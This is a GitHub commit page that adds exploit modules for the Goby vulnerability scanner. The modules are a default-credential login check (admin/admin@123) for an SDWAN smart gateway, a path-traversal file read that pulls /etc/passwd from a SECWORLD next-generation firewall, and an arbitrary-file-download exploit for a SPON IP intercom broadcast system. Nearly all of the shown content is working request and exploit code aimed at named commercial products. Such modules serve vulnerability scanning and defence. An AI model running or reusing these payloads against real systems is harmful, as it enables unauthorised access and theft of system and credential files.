Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
@MY0723
MY0723 authored Jul 17, 2022
1 parent 0368088 commit 4e8be94
Show file tree
Hide file tree
Showing 100 changed files with 10,237 additions and 0 deletions.
53 changes: 53 additions & 0 deletions SDWAN_smart_gateway_weak_password.json
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,53 @@
{
"Name": "SDWAN智能网关应用系统弱口令",
"Level": "3",
"Tags": [],
"GobyQuery": "body=\"unierm_brand/logo.png\"",
"Description": "",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "luckying",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"References": [
"https://gobies.org/"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/Login/Index/doLogin",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "username=admin&password=admin%40123"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "true",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "userid",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-06-23 18:32:59",
"GobyVersion": "1.8.268"
}
101 changes: 101 additions & 0 deletions SECWORLD_Next_generation_firewall_pki_file_download_File_read.go
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,101 @@
package exploits

import (
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
)

func init() {
expJson := `{
"Name": "SECWORLD Next generation firewall pki_file_download File read",
"Description": "SECWORLD Next generation firewall pki_file_download File read",
"Product": "SECWORLD Next generation firewall",
"Homepage": "https://www.netentsec.com/",
"DisclosureDate": "2021-05-18",
"Author": "PeiQi",
"GobyQuery": "(app=\"Secworld-Firewall\" || title=\"网神下一代极速防火墙\")",
"Level": "1",
"Impact": "File read",
"Recommendation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "File",
"type": "input",
"value": "/etc/passwd"
}
],
"ScanSteps": [
"AND",
{
"Request": {
"data": "",
"data_type": "text",
"follow_redirect": true,
"method": "GET",
"uri": "/"
},
"ResponseTest": {
"checks": [
{
"bz": "",
"operation": "==",
"type": "item",
"value": "200",
"variable": "$code"
}
],
"operation": "AND",
"type": "group"
}
}
],
"ExploitSteps": null,
"Tags": ["File read"],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": ["SECWORLD Next generation firewall"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`

ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
uri := "/?g=pki_file_download&filename=../../../../../etc/passwd"
cfg := httpclient.NewGetRequestConfig(uri)
cfg.VerifyTls = false
cfg.FollowRedirect = false
cfg.Header.Store("Content-type", "application/x-www-form-urlencoded")
if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil {
return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "root:")
}
return false
},
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
file := ss.Params["File"].(string)
uri := "/?g=pki_file_download&filename=../../../../../etc/passwd"
cfg := httpclient.NewGetRequestConfig(uri)
cfg.VerifyTls = false
cfg.FollowRedirect = false
cfg.Header.Store("Content-type", "application/x-www-form-urlencoded")
if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil {
expResult.Output = resp.Utf8Html
expResult.Success = true
}
return expResult
},
))
}
134 changes: 134 additions & 0 deletions SPON_IP_network_intercom_broadcast_system_exportrecord.php_any_file_download.go
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,134 @@
package exploits

import (
"git.gobies.org/goby/goscanner/goutils"
)

func init() {
expJson := `{
"Name": "SPON IP network intercom broadcast system exportrecord.php any file download",
"Description": "World Bond Communication Co., Ltd. is an audio as the core of the Internet of things solution provider. An arbitrary file reading vulnerability exists in the IP network intercom broadcast system of WorldBond Communication Co., LTD., which can be used by attackers to obtain sensitive information",
"Product": "SPON IP network intercom broadcast system",
"Homepage": "https://www.spon.com.cn/",
"DisclosureDate": "2021-08-24",
"Author": "[email protected]",
"GobyQuery": "body=\"lan/manifest.json\"",
"Level": "2",
"Impact": "<p>The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory (.. \\ or.. /) to download or read a file beyond the original specified path. The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system<br></p>",
"Recommandation": "<p>Limit ../ The best way is that the file should be in the database for one to one mapping, avoid entering the absolute path to obtain the file<br></p>",
"References": [],
"HasExp": true,
"ExpParams": [
{
"name": "filepath",
"type": "createSelect",
"value": "../php/exportrecord.php,C:/ICPAS/Wnmp/WWW/php/exportrecord.php,C:/windows/win.ini,/etc/passwd,/proc/version,/home/xc9000/Wnmp/WWW/php/exportrecord.php",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/php/exportrecord.php?downname=c:/windows/win.ini",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "[fonts]",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/php/exportrecord.php?downname=../../../../../etc/passwd",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/php/exportrecord.php?downname={{{filepath}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"Tags": [
"file download"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": ["SPON IP network intercom broadcast system"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`

ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}
Loading

0 comments on commit 4e8be94

Please sign in to comment.